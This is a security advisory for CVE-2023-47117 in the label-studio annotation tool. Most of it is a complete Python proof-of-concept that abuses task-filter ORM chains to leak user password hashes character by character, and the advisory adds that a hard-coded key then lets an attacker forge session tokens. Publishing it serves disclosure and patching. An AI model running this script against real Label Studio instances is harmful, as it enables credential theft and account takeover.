Exposure of Sensitive Information to an Unauthorized Actor Affecting label-studio package, versions [,1.9.2.post0)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
9.83% (95th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID: SNYK-PYTHON-LABELSTUDIO-6056277
  • Published: 14 Nov 2023
  • Disclosed: 13 Nov 2023
  • Credit: alex-elttam

Introduced: 13 Nov 2023

CVE-2023-47117  (opens in a new tab)
CWE-200  (opens in a new tab)

How to fix?

Upgrade label-studio to version 1.9.2.post0 or higher.

Overview

label-studio is a Label Studio annotation tool

Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor through the application's ability to set filters for filtering tasks. By exploiting Django's Object Relational Mapper (ORM), an attacker can construct a filter chain that filters tasks based on sensitive fields of all user accounts on the platform. Because the ORM filter determines which results the query returns, an attacker can leak these sensitive fields character by character. Furthermore, the application had a hard-coded secret key; an attacker who exploits this ORM Leak vulnerability to leak account password hashes can use that key to forge a session token for any user.

PoC


import argparse
import re
import requests
import string
import sys

# Password hash characters
# Alphabet tried at each position: ASCII letters, digits, and the
# punctuation characters '$', '/', '+', '=', '_' and '!'.
CHARS = string.ascii_letters + string.digits + '$/+=_!'
# Size of the alphabet above (not referenced by the code shown in this script).
CHARS_LEN = len(CHARS)

# Template of the JSON body sent with the PATCH request in test_payload().
# It is a single module-level dict that is mutated in place:
#   * setup() overwrites "id" and "project" from the command-line arguments;
#   * test_char() overwrites the filter item's "value" before every request.
PAYLOAD = {
    "data": {
        "columnsDisplayType": {},
        "columnsWidth": {},
        "filters": {
            "conjunction": "and",
            "items": [
                {
                    "filter": "filter:tasks:updated_by__active_organization__active_users__password", # ORM Leak filter chain
                    "operator": "regex", # Use regex operator to filter password hash value
                    "type": "String",
                    "value": "REPLACEME"  # placeholder; replaced by test_char()
                }
            ]
        },
        "gridWidth": 4,
        "hiddenColumns":{"explore":["tasks:inner_id"],"labeling":["tasks:id","tasks:inner_id"]},
        "ordering": [],
        "search_text": None,
        "target": "tasks",
        "title": "Default",
        "type": "list"
    },
    "id": 1, # View ID (default; overwritten by setup())
    "project": "1" # Project ID (default; overwritten by setup())
}

def parse_args() -> argparse.Namespace:
    """Parse the command-line options of this script.

    All four options are required: the view id and the project id (both
    parsed as integers), the cookie string, and the base URL.

    Returns:
        The parsed namespace, exposing ``view_id``, ``project_id``,
        ``cookie_str`` and ``url``.
    """
    cli = argparse.ArgumentParser(
        description='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
    )

    # (short flag, long flag, help text, extra add_argument keywords)
    option_table = (
        ('-v', '--view-id', 'View id of the page', {'type': int}),
        ('-p', '--project-id', 'Project id to filter tasks for', {'type': int}),
        ('-c', '--cookie-str', 'Cookie string for authentication', {}),
        ('-u', '--url', 'Base URL to Label Studio instance', {}),
    )
    for short_flag, long_flag, help_text, extra in option_table:
        cli.add_argument(
            short_flag, long_flag,
            help=help_text,
            required=True,
            **extra
        )

    return cli.parse_args()

def setup() -> dict:
    """Turn the command-line arguments into the run configuration.

    Side effect: stores the view id under ``PAYLOAD["id"]`` and the project
    id, converted to a string, under ``PAYLOAD["project"]`` of the
    module-level ``PAYLOAD`` dict.

    Returns:
        A dict with the keys ``COOKIE_STR``, ``URL_PATH_1`` (base URL plus
        the view path), ``URL_PATH_2`` (base URL plus the tasks path) and
        ``PAYLOAD`` (the module-level ``PAYLOAD`` object itself, not a copy).
    """
    cli_args = parse_args()
    ids = {"view_id": cli_args.view_id, "project_id": cli_args.project_id}

    # Both paths are parameterised by the same view/project pair.
    view_path = "/api/dm/views/{view_id}?interaction=filter&project={project_id}".format(**ids)
    tasks_path = "/api/tasks?page=1&page_size=1&view={view_id}&interaction=filter&project={project_id}".format(**ids)

    PAYLOAD.update(id=cli_args.view_id, project=str(cli_args.project_id))

    base_url = cli_args.url
    return {
        'COOKIE_STR': cli_args.cookie_str,
        'URL_PATH_1': base_url + view_path,
        'URL_PATH_2': base_url + tasks_path,
        'PAYLOAD': PAYLOAD
    }

def test_payload(config_dict: dict, payload) -> bool:
    """Send *payload* to the view URL, then report whether any task is listed.

    Issues a PATCH to ``config_dict["URL_PATH_1"]`` with *payload* as the
    JSON body, followed by a GET to ``config_dict["URL_PATH_2"]``. Both
    requests carry ``config_dict["COOKIE_STR"]`` in the ``Cookie`` header.

    Returns:
        ``True`` when the ``"tasks"`` entry of the GET response's JSON body
        has at least one element, ``False`` otherwise.
    """
    sys.stdout.flush()
    auth_headers = {"Cookie": config_dict["COOKIE_STR"]}

    # The PATCH response is not inspected; only the follow-up GET is read.
    requests.patch(config_dict["URL_PATH_1"], json=payload, headers=auth_headers)

    listing = requests.get(config_dict['URL_PATH_2'], headers=auth_headers)
    listed_tasks = listing.json()["tasks"]
    return len(listed_tasks) > 0

def test_char(config_dict, known_hash, c):
    """Check whether ``known_hash + c`` passes the filter test.

    Writes the anchored, regex-escaped candidate into the first filter item
    of the module-level ``PAYLOAD`` (mutating it in place) and hands that
    payload to ``test_payload``.

    Returns:
        The tuple ``(known_hash + c, c)`` when ``test_payload`` returns a
        truthy value, otherwise ``None``.
    """
    candidate = known_hash + c
    escaped_candidate = re.escape(candidate)

    filter_item = PAYLOAD["data"]["filters"]["items"][0]
    filter_item["value"] = f"^{escaped_candidate}"

    if not test_payload(config_dict, PAYLOAD):
        return None
    return (candidate, c)

def main():
    """Script entry point: extend the known prefix until no character fits.

    Starts from a fixed prefix, prints it, then repeatedly tries every
    character of ``CHARS`` via ``test_char``. The first character accepted
    in a pass is appended and echoed; the loop ends after a pass in which
    no character is accepted.
    """
    config = setup()
    # By default Label Studio password hashes start with these characters
    recovered = "pbkdf2_sha256$260000$"
    print()
    print(f"dumped: {recovered}", end="")
    sys.stdout.flush()

    while True:
        for candidate in CHARS:
            outcome = test_char(config, recovered, candidate)
            if outcome is not None:
                recovered, accepted = outcome
                print(accepted, end="")
                sys.stdout.flush()
                break
        else:
            # The whole alphabet was tried without a match: stop.
            break

    print()

if __name__ == "__main__":
    main()

CVSS Scores

version 3.1